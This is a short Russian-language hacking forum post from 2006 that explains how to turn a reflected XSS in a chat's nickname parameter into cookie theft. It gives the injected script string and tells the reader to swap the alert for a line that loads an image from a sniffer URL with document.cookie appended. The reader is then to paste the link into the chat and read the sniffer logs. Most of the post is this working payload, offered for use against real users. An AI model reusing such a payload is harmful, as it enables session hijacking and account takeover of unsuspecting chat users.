12.03.2006, 22:16
|
|
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641
Репутация:
412
|
|
Вобщем, к примеру....
au_nick="><script>alert('wvs-xss-magic-string-2125609660')%3B</script>&nicks=1
В этой строке вместо
alert('wvs-xss-magic-string-2125609660')%3B
пишешь..что-то вроде
document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie
потом полученную строку кидаешь в чат и идешь смотреть логи сниффера... а потом.. уже описано, что потом. |
|
|